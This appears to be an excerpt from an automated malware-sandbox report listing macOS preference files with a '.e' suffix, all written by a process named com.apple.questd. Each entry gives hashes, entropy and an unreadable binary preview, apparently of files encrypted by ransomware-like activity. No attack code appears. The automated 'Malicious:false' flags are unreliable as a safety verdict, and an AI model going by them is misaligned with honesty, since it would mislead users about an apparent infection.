                                                                                                    Preview: ..@.7R..k.yb4En.....th..X.....'.g..4T...Gq..QWa..Q.&.{).r.K.F_.u_#Z....~.J...9..;.|..[....f....V.f'B..[}5T...K..b......bF.c*..#f$.+f ]....:.0=2...>..#.Q..,{C.5Q.rq:...&.f'B..[}..k...O...X.....R.X}s....r....,....V.....Dz..6.q}UnW....'._..7._.J...9...s.>.h....f....V.f'B..[}Fy[...Z.FM3z&]z...V..[../.......+...B....MF.@jyD.s.>.h....f....V....=.g..0....g. ....S7.R.X}s....r....,...A...*.R.X}s........]l~...Q..Zf..f....V..^.t.....,{C.5Q.f'B..[}....B..E....ty.*.@5.+..?.v....JW.y>..t....f....V..^.t....f'B..[}.%df.!9-........$....7..{.*........|..g|w%@...O..y>..t....f....V..^.t....f'B..[}....R...U....M.C.Q.&.{)..q.VP../."b...+..s.>.h....f....V.(..|..H.0....g....*..O..Dz..6.q}UnW.......LL-)..J...9...s.>.h....f....V.f'B..[}............,K..C._.{...#..(].P.x,c/..#J..w..J...J...9...s.>.h....f....V.f'B..[}Z.5r.|^Ob......b..............}.b......b........P.K5^k3.r....a....j..!.Y...|..x..,!>...Wt.J&m.|^...4.*.......E...........fJ...^mO..}#E.?"..s0...y...6Y7.B".......+....k..........._...`i................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.cloudd.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):410
                                                                                                    Entropy (8bit):5.3680527855517095
                                                                                                    Encrypted:false
                                                                                                    MD5:9971FC2338454EFB8F93038D4652A3A9
                                                                                                    SHA1:AAAA2FA248F633DB214EC269C91D3F42372E4189
                                                                                                    SHA-256:555DB922CCC78A42E75AA1AAEEE44587327E8777AE3C06B202EC8DAA62AB7C9E
                                                                                                    SHA-512:56F00B512322B6CC8B8CECFEDB0283293F7D358462655AFBF4D9D7C04FC81BE2B820E9770F9723A13E69B2F0F98E37DEE167A49DCD04FD1BE5A0EC76ADABFDE1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....\q...5.MN.z>...H.v1E9...6H..h.f.m=P...3.q.W._...=.r..o>p~...F!...{)..".................A^.l..z.i................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.cloudpaird.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):354
                                                                                                    Entropy (8bit):4.881280069575124
                                                                                                    Encrypted:false
                                                                                                    MD5:D07A2C55DBE97227F3E6DCCE315CA8D1
                                                                                                    SHA1:0C5993B26746515EA4773FE0656542A32CFB0953
                                                                                                    SHA-256:7EE5B338BE0246258B0CFA63C57F322B55B432C21383BB3EB61D8E55B9E3FA02
                                                                                                    SHA-512:19EE4AC26C4ABFFDE0B89C410ED071D6522D9B31DE11E433B7D58F6888876C9408E69E112CC7D9F3C85644DC5E95A56B008F79E680973165D48A83CC1B8A4071
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..t....M.I....|.. P...]..?.........s_I.g|..1................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.commcenter.carrier_bundle.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):386
                                                                                                    Entropy (8bit):5.156050112166088
                                                                                                    Encrypted:false
                                                                                                    MD5:F8D9523351321332DF26438FE33C31D5
                                                                                                    SHA1:E5C9E763B0E2F45501FEAF0B7072F9C43F970C5C
                                                                                                    SHA-256:75238EFED27F5945DF574895FF7C5F5C034A328B423DEE99E2B5E511B3F06B8E
                                                                                                    SHA-512:9A455809B43D1E11E55B5BE25070255A5AF1C377165EBCC36D0B91361FE6D11F00F48049D4C9AA7E691FCB482CE84F566A1AB313C1AA4121D9B46A26FB3F9951
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...1p.Q...8..D<..\{.7#}.`+.EY.o.....(...5.s.T..\.!..p.e&............O.^..T.Q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.commcenter.device_specific_nobackup.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):394
                                                                                                    Entropy (8bit):5.280227871287468
                                                                                                    Encrypted:false
                                                                                                    MD5:27E5A34446374DAFB5AAB86B3696A23F
                                                                                                    SHA1:0D689AC990D11B06E57BD9447A6F39B7D2DBA210
                                                                                                    SHA-256:CEE97A7EDBB61E58BFA1A5CAE324BBA26DC6795C08C629F09682151D87EA717A
                                                                                                    SHA-512:9E9B5254FBAE788E9BBE2F6D65D0464C50AC38EF31BF5E387CA2E7AA429CE2ADB1C051A188DCEEE0897E338723D0BFD8E6E616AC74FBC5163879158734C82C58
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...@...~....?CM..t....kVK..X...i.~.R.H.D.A.O.........{)..".e.....*.........|.d...:.Y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.commerce.configurator.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):354
                                                                                                    Entropy (8bit):4.893327138802499
                                                                                                    Encrypted:false
                                                                                                    MD5:911FA0E53B2DD35829E375C6A947D591
                                                                                                    SHA1:A695F86CACDB3DC6CEFBC87E7B472A74675ED9A0
                                                                                                    SHA-256:BF72B9611FD11984A673E67876BF6B46BB4966E81CD6B31E9088989C2B2F28DC
                                                                                                    SHA-512:A6A626C435A440A7E3EC698763EF4A9436C22BB142C39F28391659757C81CF918AF96E41BAD7BDB12D3CBDF92983A31FFFA1945874942B33E72F730E4FB1A6F1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..t....M.I....|.. P...]..?.........pZ+..[..1................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.commerce.knownclients.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12914
                                                                                                    Entropy (8bit):7.956072436213414
                                                                                                    Encrypted:false
                                                                                                    MD5:B923EF59AE767423CA3A67A033F9AA04
                                                                                                    SHA1:4C3F21290F8763061C76F227E33F68D87F251340
                                                                                                    SHA-256:58111960A4DA69B1CBE581F177A2A963C03A85DAE33CD546A52583CEB8F0D612
                                                                                                    SHA-512:2342DCA25977E3E195B6864D0B4573E51C71FC40064EEA3837C1938DEFD265EE4FDB5FE1F94BBB5EA11A49E0C5CF050CC5AC129D69D2FC5BE06B04D524EA8F8C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..[.2.q.........:._S...g......5..k..........%..I...T......=&....X......WG...R.....>..Sy.......lo;....0$u....-9.J.......l.........L.....w....!.....J@....=.n'.]y..L..D...2..B."..#...4r..>...q..$v....6..9...1..,4....w...r;-s[...<.{]..t...<At..i../Xl.`.....`..|..}.......EQ..X'>...|.*.q..S......3A..p.3B...[T.Q.#/u.v....l0.6>.eu*sQ..N..T.L..ea.|x..9.....U.EA..x.0E.".8..u.[DEe.U|....v....T...R..A.q...C....X..N...H^.1.........(..+.|.v..F....F.D'.i....e..`/..AF5.*......$,..M..z....D)x[..L...J....5,Q...7%!W.L.,F.bR'..*c..\.ah%...N.1..(#'4.*U.2...2c.+QFN.>.]..%..g!..-...R.3...+/.6.h.6N.h....S.gJha|.)c.$.T..*....`q..h......{.\.o...W.!..0..%hh.....x...q...S.f.B.[aO.'.i...O.q...........2wX..-ndX.A5...}...-6.an..7.....8.N.Yl..I.W..D.v..Y....uw.Oh.e.b.....l4.4..x...."..>i.....q.[.j.)]_y..d....J....... U!Dt.....^.A..)..K.^.T......j4!.^....).@h..Pm\.Yx....}O......3....BZ.c^A.a...CiD.._.$...W.W.......u4....G..MG..wY.bO;....\#.U....h(.W6. s.w...._.....i.o....V#K..mX+k......]........e.!.......;D.#.q\
                                                                                                    /Users/ben/Library/Preferences/.com.apple.commerce.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):810
                                                                                                    Entropy (8bit):6.9025506022633145
                                                                                                    Encrypted:false
                                                                                                    MD5:C418D90CDAA58145830C9A3821DAB9FC
                                                                                                    SHA1:6990EEC07CC4769C982108B1FC04A4852868A738
                                                                                                    SHA-256:7F6BA15E990862686A5401408A041E1A8B429D1AC129D80E57FC43FF34CB36C6
                                                                                                    SHA-512:922101AEB301D7C7FCC4509E765255210864FDDB3801ED622731F8CBB80E92781F743459330E6F670EF33D58B9EF9DE3D00BC81714B1D9A012D808D2A3CEC964
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..$Z.:/...6...z0..y..x...-.............Q....1.a.%dv.^.......0.O.|...1...g.#.2.zC......N.qv.7M..b.6~..P..1E.\.(,4}lLM.rQ.C.g..;.'.l*?.y|>.$&.. ..o'..r7O..i.~.u..E.Q..UY`...F......iQ"a.,9,].E.....K;.!..g.....!.FyKe......Ch........-....u|x3..KI.~MA.KC.ts..k.X...B.....!#.nt.o..;S..N.......#.+8..b.......T.6....`Y.. y...."+d....LZ.a.-.....Y...*|$..kW...PA..&0q!.O.J K...N...s.m..#...}...o..G..........AK.[1...5..vA.f.(.."..._.s......`+v9n.^3.. z..aB.a..@.HJjV....sE:u7.G.$..x...%.w...Z!..........".2.....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.commerce.safari.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):386
                                                                                                    Entropy (8bit):5.208223597884787
                                                                                                    Encrypted:false
                                                                                                    MD5:45229D2D9B3182DA13CB2B3F6C466D66
                                                                                                    SHA1:D0C7F378CB4FBF3A7142B85624CF98C54071C16A
                                                                                                    SHA-256:1DA01903C4D74B988E788D8011FF9FFD969F1DA6AF9D7133C8A1563454741AA4
                                                                                                    SHA-512:A551EFE1146BDFB5406C3CB12D289AE45B3CB626AB2E50A26A605585246DE97CB0A797F59EC5D3C2914D749EE0AA744B31EFD2D8ACFFB2461C665A6CC102F8AA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R.........X.xf.<Y`b............N1.I.....M2.......]!............)q[...7.?P...Q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.commerce.spotlight.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):386
                                                                                                    Entropy (8bit):5.199816570688319
                                                                                                    Encrypted:false
                                                                                                    MD5:503BDBAB0131C0C90FECDAE176F9CDA0
                                                                                                    SHA1:048F198D04553B4E7FBD7FBCEB449D347E6C9705
                                                                                                    SHA-256:1835A9F73FBE19FF1F6EF7ED2182C597DA2BFCB8A088FBC32A1D488967C06C02
                                                                                                    SHA-512:9556E2B2F3D3932B43D41A65B75F7B229A0B78311510FE137CDD60A88DF16E4EB2393A6659822B62B400DA458FBDFDD5A47A9384008A0088AA6BA36E81E956D9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R.........X.xf.<Y`b............N1.I.....M2.......]!............)q[....=pk...Q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.configurator.ui.commerce.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):354
                                                                                                    Entropy (8bit):4.898976856316621
                                                                                                    Encrypted:false
                                                                                                    MD5:057F6F2AAF18A3AE83491B9B05DF851B
                                                                                                    SHA1:85DC406FF6E233127ED60314F64E5364485E7CEF
                                                                                                    SHA-256:0FDF33BBC960D4C4B676933E48714FA370F4B5174ACE07224BB920A0D17FD520
                                                                                                    SHA-512:0E317D488EE2E53A1BAAA08B752A274127F75C98FE12667EF2355A13F2F966E379653078D9479A92D902D0E34B096A74DB856956333BBA410EFE1EB13BDFC4CF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..t....M.I....|.. P...]..?...........;.et>.1................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.coreauthd.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):674
                                                                                                    Entropy (8bit):6.613409972577436
                                                                                                    Encrypted:false
                                                                                                    MD5:867562DCD69D6A8109E26FAE6AEFE544
                                                                                                    SHA1:4F32779A9C44F9A1998B1F371677DB13E373A506
                                                                                                    SHA-256:086F9B5B211456A2BD3EAEF0E377DAF0AF9BAF92A2B38E7B664E497195731116
                                                                                                    SHA-512:AA64FF99622194EA67A4111CDD695563C23A02266F1E6A8E4E23CD9334403500CFC25595EBE92F00068D1A773F2A5B977F2B71F9A8C817C5BD32E8CEDD13DFFA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....2.#.T..M..[.....Lc..(.'.".yO.{..-e}t~+....Uz4T....>.....(...G.MclB...J.......hcx....R.#..A.."s...2.(y!.B>.......e../<*,........2.M.....:.e..P..E..e..(.H.,.8..b...,.0..y."......X......r..ZnY........-...T......29......|?...../d4...(.....rv..c?.f#....8M..V..Q.."....7...nf.>t.....,.V.`.W=...g...g........Cf.`q..?...L.A.?pp.$k..g....lb.lx.m=..!*A...........B.....q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.coreservices.uiagent.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):666
                                                                                                    Entropy (8bit):6.575659077437774
                                                                                                    Encrypted:false
                                                                                                    MD5:F96A61AC57381DCEEE6B64C88B4243A3
                                                                                                    SHA1:AE1A6E3E2A7353AB05594D0404746C5B962F5E61
                                                                                                    SHA-256:B4EAE1EB98B4D32281E1D2DE54F82B946865BE9FD411945306A6EFB682EC2B35
                                                                                                    SHA-512:867E049976ED93EC7C396DEA24F129084C01D2E473BBDAEC7F926203618AC7595136EE44CC029D41C8BEEE3FCF78A634A6FE42DE36CB9CBDD0E5B26EE3459B81
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....6/.....9..4d..B..!.}d...^...m...Y....@.c...e).'L}./..%.......*......`[B^:.....9.....V3.;8......-.......[I..[...%...@.?..([2..2.....?8.N.A........;.J5|..U.W....&.......(..R......;...Rx>.....1....d...@`#..D"..R....`......z.....#...........u....LL..p,..^J.......}C".e..P..{. Q....'-..Tn.k.X.h..r.b^.Zdd...O....w]^.m3O.b.d....\....y.B..[.{...#Rox......s..i................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.coreservices.useractivityd.dynamicuseractivites.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):354
                                                                                                    Entropy (8bit):4.878510436831208
                                                                                                    Encrypted:false
                                                                                                    MD5:3E025F2E393F344DEA87FF018709F5BD
                                                                                                    SHA1:49359940FA8C81B676D45B06DEFEC97DBA76386B
                                                                                                    SHA-256:01440F647A05E08755144A00A3ED5FE05163089AAD9668812F96AA59BB2FBFA3
                                                                                                    SHA-512:FA77BFC6D4D09AF71295120F5FC3B234F8037FEFC1FA930EB9CB99A6F67B66BCFDE02FDCE2453F0217A2FD061D07663C9F804E2D03A31C73C652AA98C616CD6C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..t....M.I....|.. P...]..?...........k.l...1................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.corespotlightui.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):546
                                                                                                    Entropy (8bit):6.178408244348036
                                                                                                    Encrypted:false
                                                                                                    MD5:FF709A25BD98EE7DF5BCBDD775D40A19
                                                                                                    SHA1:D0BFA32DEDAC879D426559605A028E39329393F1
                                                                                                    SHA-256:2AEDF64DE9FC45D4955F6785DEE14842EC753AD98B656BF901AEAD287D147B78
                                                                                                    SHA-512:01B1B6FA6F2FA875BDDC67FEA83BD6950BC186FA97A3B13279058A9EA07EF09C51ACDDEDD2E92B669A9B1D896FB01C2BE6F237BB8E2F10EC4C6D3672479CBEDB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..7......K.<.qb...>....<..@....u.....G..dEN..x(@........X^...w.cg..2??+'...<...I...c.}.W+./.@J.OR..MN.z>.....V.|.C...0$u........5.Q...}.qh...Wl... ..'......[n....#5..W..d.MN.z>..S...n.R..3.~.....NdVXa..s.T..\.!Y.9...............;ejnoR..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.dock.plist.3aWGAHw.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.dock.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):18467
                                                                                                    Entropy (8bit):7.928636341924687
                                                                                                    Encrypted:false
                                                                                                    MD5:459D2E6F476AB0495AB83BD5739BE1D1
                                                                                                    SHA1:3F9D40EE4B42C2837A079F2451E1CB8DDB49AB81
                                                                                                    SHA-256:C233B9E9B608A8DEE4FE870776EA735AAB6AE82169AC2CF247EA3D05471936E8
                                                                                                    SHA-512:8F2E066620EA40406BB68EB3B4C99DD065EBF402DD6EDDD8C0D8B6C6E42A146BC0EA3BC069EC2A1516890557002517D6610B96ABB9967C99D832CCFD398FAD1A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..X.....R.;.jF....#D&%.jAY..gT....n.O.2u..X...E.a.w..K.2...So.n.............}..%p..M:x......-.5...c...>S.n`9...3.....P...% T...1...9p...2.(h$..,..I.V.D.a....6.8.q&...5L.u....f...;.iB.....DJv.4.......e..W.g..X..{,.?...G.....P......u'o..@...#...?..T4}`.t.p).RBW....S..y....~.R...R..V.T.z../..k.....e..F..g.:?F...+..c.khp....*.~.?e..Mg..xr_...ci.*UL.>....h....<(.\.[..=.ep.UOO:ok.n..C[...Z........................................!Z.]=E.....I.4^_y.....M.XU.t.R..>6.......FL.$K..>RdX...7..T.........l........i.....@.%.......i....S.M.tE.....i...]1..r.k...A....He..:....D..s...Ixd.I......u..O.S..1.a.....83................9.B....P#c'd!./...{3.... ...b.."..Z....$jn..n..>..5NC........=l.%.[...H0.q......(X.... ....@..S...lY.w,2..d.0vE~x..H_..Y..m1)..... ....>D.f...<*(...........C.k|..1..........b....._.....5k.S...R&!.XQbq...L9.*q|.....m..."..7...f.%.........SG.s.Z.6..y.vft*<.'Qr2.Y...........4...f'B..[}...t#.`o...J.....MV.}..x.k.../..M.......P...S..Q.S.9...{\.A...H.....q.........q.X......g.Nv&.'..
                                                                                                    /Users/ben/Library/Preferences/.com.apple.driver.AppleBluetoothMultitouch.mouse.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):658
                                                                                                    Entropy (8bit):6.57018194557321
                                                                                                    Encrypted:false
                                                                                                    MD5:D3DB5E7160BB01A6DDCD0884099E8F9A
                                                                                                    SHA1:706258AF1D627912F4977B66D605FA8DC78A6A71
                                                                                                    SHA-256:B822B596CEEA1A1C23D02FEE7125E0EA109775D0777D65A5A067044EB2885AE2
                                                                                                    SHA-512:0AE864BF8C3A6F7F95F07AB658339CDD56F5F538C2C5126B2C262409B9A451AF132D97D0DE17B804E0AFF387AC09853D2980B819A3E65AFE478353A7CCE8DB7E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..3$?)...`)....`....v.P.=(or"4..74.8....1..T.s{...p..`.)..../..%zeE..I1.......^B.k..3eA...J.H`..z.....GdDWZ./.;...'....p.+..JG....\.x..........<.....o/....@...r....b..........X....g[.ZZ.........B........\y...3..."...6O../..%ze..l.q..`..j..}6b..9@;`x0Q.........dy....x.`..-.o.x:_s..I|...ou.U..6....F.Z.7.1..C.m]!btZ....\...&.aL6...G.....1...._..i..a................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.helpd.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):394
                                                                                                    Entropy (8bit):5.225381068052862
                                                                                                    Encrypted:false
                                                                                                    MD5:5EF0411159754A02713BAB452FFDD6CE
                                                                                                    SHA1:21FC2DBF85858DD368263B91C57E3DB1D043A641
                                                                                                    SHA-256:58D3E05918A7A14C3934D4C495315B59D951722BB1AF42B7AB8E85EAF4DDD20F
                                                                                                    SHA-512:662F2EA3C2ED35F3258D339BDA9B03962B0DE995BC81B0ACBC5F34811862F214CC0D34B7E7E77D35EB49B5E160BC21DDDE170B5E6E32AC1C8840F3FB2C83A673
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....W..o.a.MN.z>..&.)T.....w.-_B.t Q.U...f.....M2.......]!...........?.U...X.......Y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.homed.notbackedup.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):402
                                                                                                    Entropy (8bit):5.338056958327501
                                                                                                    Encrypted:false
                                                                                                    MD5:6AF42E5682A9F8E67435BC86254557AB
                                                                                                    SHA1:49810217CD1922C1B44C177B59F33E079293C5AE
                                                                                                    SHA-256:8BBE404FA977DA8814FAEE84A77043B622782C74CD476F26487F15DC9A995DFE
                                                                                                    SHA-512:36CCA5266B12B6E270B605C16CB46EADF9ECDEB4E2DC5EE859EA6D4784AF96D2B3EDC7B013A2FAF559D47B937BEC026B4DF65B138C957B5ED3F907FA80EB0440
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R.......Z...A".u...(h.h....f..&...b.1V.5n..}.K..t.......r..h...7....m=..!*A.L.D<.+.0D.&...@.a................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.iBooksX.commerce.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):378
                                                                                                    Entropy (8bit):5.095538791755325
                                                                                                    Encrypted:false
                                                                                                    MD5:F62EAD386EBA6B08FB31FB92AF137ABE
                                                                                                    SHA1:DEFC4EA18DF07F06D1FC6FFBEF1F1361225CA730
                                                                                                    SHA-256:0FA1C3AF8CFD3EC1F51B402BE12A4319530AFC883F755D34206CBA96E039901E
                                                                                                    SHA-512:C14F9C6A99B4C38DCA988D82C5CC44E19C8AD213E0D14FA2918AF6DC235A60536639867BEA7525CDECA87136760EDBA21BAD988BC343B46CA34BBA5DB535C4C0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....X.pHC2..cg....5..[T..y.^.g...ys.T..\.!..p.e&..........XWA.b....I................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.madrid.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):938
                                                                                                    Entropy (8bit):7.117144249608472
                                                                                                    Encrypted:false
                                                                                                    MD5:DD0FF8E1ABAFCDABFF4566EE70751ABF
                                                                                                    SHA1:DEF0F0ADA4428F83670BD247879AB1CA73432C97
                                                                                                    SHA-256:5272962FF505BACAE43878BCEDB9318D8F14901BBBDB164DA2606635168E0078
                                                                                                    SHA-512:152C06416ED50F6E5091813C9309A470E6F4281088363C5228ED9795E728980F3D1848080B97FBFEBE332B1A0079CEF3C03CE5989D70EEF4CAF92AA924151F87
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..k.yb4En.....th....d"..b....m.r..M'R..J2......d...6=C9/....H.v.x}.z../`..G1>.........-.C.4....u'N.......2^.....)_..F/..u.P...4./.?b....U1.....f..^4.t....,.[j .;.r........e..#I....^..j\b....@.....Fq........b+.....:...Fy\m....Dq..g...O..f.H(.@....B....,.5.~f.m.]nB.(..U...t.P..K......i.....]n..,......Yy>.....}...xr..X..........[..`0...;qC^.D..f.8..0..V..8r.....]6J...m.|..f8..s.j... ......B.ul....Nt..^w....+..~..m..,.S^..h4a..S.X.._k.9RN3..f....Y.aN}M...{.CcO...c...*..uj..Hp..C.:>2;Ra..V6...b...RO_...-7.:tU."b..5....t...<r./..L...%....T..eo$x...U.'..F.XD..H...*!...].....~.........=.....C....$..x...D8.:.i........../.u....#.y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.metadata.SpotlightNetHelper.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):466
                                                                                                    Entropy (8bit):5.785124766208276
                                                                                                    Encrypted:false
                                                                                                    MD5:84FF6E782CBFFDD91A75EDA74CED77DE
                                                                                                    SHA1:52A34FC34A898CC85D324EDAC3DD8A1E5C1A1E32
                                                                                                    SHA-256:70C69ED5DA9434CFEAC8BC41654C3A56ABF4755FBB4F2AD0FF20698331E1F56F
                                                                                                    SHA-512:636FB8B9FC8925E5AFB638A70FF64B0E2CCFC1B1F3D260622D15D805C86F97EAD1D44111571B28695EC79B2EE70E0E5C46D6ADE3E45ECF4B1491C1BA96644A9B
                                                                                                    Malicious:false
